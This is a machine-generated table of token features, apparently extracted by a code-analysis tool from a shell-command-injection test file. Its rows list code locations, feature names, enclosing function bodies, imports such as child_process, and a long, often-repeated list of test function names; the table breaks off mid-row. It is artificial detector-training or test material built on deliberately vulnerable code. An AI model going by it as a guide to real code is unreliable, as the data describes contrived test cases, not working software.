Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:19:458:23 | value | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:19:458:23 | value | contextSurroundingFunctionParameters | (props, ?) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:19:458:23 | value | enclosingFunctionBody | props key value Object assign props key value configurable true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:19:458:23 | value | enclosingFunctionBody | props key value Object assign props key value configurable true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:19:458:23 | value | enclosingFunctionName | reduce#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:19:458:23 | value | enclosingFunctionName | reduce#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:19:458:23 | value | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:19:458:23 | value | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:31:458:36 | Object | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:31:458:36 | Object | contextSurroundingFunctionParameters | (props, ?) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:31:458:36 | Object | enclosingFunctionBody | props key value Object assign props key value configurable true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:31:458:36 | Object | enclosingFunctionName | reduce#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:31:458:36 | Object | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:31:458:43 | Object.assign | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:31:458:43 | Object.assign | contextSurroundingFunctionParameters | (props, ?) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:31:458:43 | Object.assign | enclosingFunctionBody | props key value Object assign props key value configurable true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:31:458:43 | Object.assign | enclosingFunctionName | reduce#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:31:458:43 | Object.assign | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:31:466:4 | Object. ... },\\n\\t\\t\\t) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:31:466:4 | Object. ... },\\n\\t\\t\\t) | contextSurroundingFunctionParameters | (props, ?) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:31:466:4 | Object. ... },\\n\\t\\t\\t) | enclosingFunctionBody | props key value Object assign props key value configurable true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:31:466:4 | Object. ... },\\n\\t\\t\\t) | enclosingFunctionName | reduce#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:31:466:4 | Object. ... },\\n\\t\\t\\t) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:31:466:4 | exceptional return of Object. ... },\\n\\t\\t\\t) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:31:466:4 | exceptional return of Object. ... },\\n\\t\\t\\t) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:31:466:4 | exceptional return of Object. ... },\\n\\t\\t\\t) | enclosingFunctionBody | props key value Object assign props key value configurable true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:31:466:4 | exceptional return of Object. ... },\\n\\t\\t\\t) | enclosingFunctionName | reduce#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:31:466:4 | exceptional return of Object. ... },\\n\\t\\t\\t) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:38:458:43 | assign | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:38:458:43 | assign | contextSurroundingFunctionParameters | (props, ?) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:38:458:43 | assign | enclosingFunctionBody | props key value Object assign props key value configurable true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:38:458:43 | assign | enclosingFunctionName | reduce#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:38:458:43 | assign | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:459:5:459:9 | props | CalleeFlexibleAccessPath | Object.assign | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:459:5:459:9 | props | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:459:5:459:9 | props | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:459:5:459:9 | props | contextSurroundingFunctionParameters | (props, ?) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:459:5:459:9 | props | enclosingFunctionBody | props key value Object assign props key value configurable true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:459:5:459:9 | props | enclosingFunctionName | reduce#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:459:5:459:9 | props | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:459:5:459:9 | props | receiverName | Object | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:460:5:465:5 | {\\n\\t\\t\\t\\t\\t ... ,\\n\\t\\t\\t\\t} | CalleeFlexibleAccessPath | Object.assign | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:460:5:465:5 | {\\n\\t\\t\\t\\t\\t ... ,\\n\\t\\t\\t\\t} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:460:5:465:5 | {\\n\\t\\t\\t\\t\\t ... ,\\n\\t\\t\\t\\t} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:460:5:465:5 | {\\n\\t\\t\\t\\t\\t ... ,\\n\\t\\t\\t\\t} | contextSurroundingFunctionParameters | (props, ?) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:460:5:465:5 | {\\n\\t\\t\\t\\t\\t ... ,\\n\\t\\t\\t\\t} | enclosingFunctionBody | props key value Object assign props key value configurable true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:460:5:465:5 | {\\n\\t\\t\\t\\t\\t ... ,\\n\\t\\t\\t\\t} | enclosingFunctionName | reduce#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:460:5:465:5 | {\\n\\t\\t\\t\\t\\t ... ,\\n\\t\\t\\t\\t} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:460:5:465:5 | {\\n\\t\\t\\t\\t\\t ... ,\\n\\t\\t\\t\\t} | receiverName | Object | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:461:6:464:6 | [key]: ... \\n\\t\\t\\t\\t\\t} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:461:6:464:6 | [key]: ... \\n\\t\\t\\t\\t\\t} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:461:6:464:6 | [key]: ... \\n\\t\\t\\t\\t\\t} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:461:6:464:6 | [key]: ... \\n\\t\\t\\t\\t\\t} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:461:6:464:6 | [key]: ... \\n\\t\\t\\t\\t\\t} | enclosingFunctionBody | props key value Object assign props key value configurable true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:461:6:464:6 | [key]: ... \\n\\t\\t\\t\\t\\t} | enclosingFunctionBody | props key value Object assign props key value configurable true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:461:6:464:6 | [key]: ... \\n\\t\\t\\t\\t\\t} | enclosingFunctionName | reduce#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:461:6:464:6 | [key]: ... \\n\\t\\t\\t\\t\\t} | enclosingFunctionName | reduce#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:461:6:464:6 | [key]: ... \\n\\t\\t\\t\\t\\t} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:461:6:464:6 | [key]: ... \\n\\t\\t\\t\\t\\t} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:461:7:461:9 | key | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:461:7:461:9 | key | contextSurroundingFunctionParameters | (props, ?) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:461:7:461:9 | key | enclosingFunctionBody | props key value Object assign props key value configurable true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:461:7:461:9 | key | enclosingFunctionName | reduce#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:461:7:461:9 | key | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:461:13:464:6 | {\\n\\t\\t\\t\\t\\t ... \\n\\t\\t\\t\\t\\t} | CalleeFlexibleAccessPath | Object.assign | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:461:13:464:6 | {\\n\\t\\t\\t\\t\\t ... \\n\\t\\t\\t\\t\\t} | InputAccessPathFromCallee | 1.? | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:461:13:464:6 | {\\n\\t\\t\\t\\t\\t ... \\n\\t\\t\\t\\t\\t} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:461:13:464:6 | {\\n\\t\\t\\t\\t\\t ... \\n\\t\\t\\t\\t\\t} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:461:13:464:6 | {\\n\\t\\t\\t\\t\\t ... \\n\\t\\t\\t\\t\\t} | contextSurroundingFunctionParameters | (props, ?) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:461:13:464:6 | {\\n\\t\\t\\t\\t\\t ... \\n\\t\\t\\t\\t\\t} | enclosingFunctionBody | props key value Object assign props key value configurable true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:461:13:464:6 | {\\n\\t\\t\\t\\t\\t ... \\n\\t\\t\\t\\t\\t} | enclosingFunctionName | reduce#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:461:13:464:6 | {\\n\\t\\t\\t\\t\\t ... \\n\\t\\t\\t\\t\\t} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:462:7:462:11 | value | CalleeFlexibleAccessPath | Object.assign | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:462:7:462:11 | value | InputAccessPathFromCallee | 1.?.value | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:462:7:462:11 | value | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:462:7:462:11 | value | assignedToPropName | value | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:462:7:462:11 | value | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:462:7:462:11 | value | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 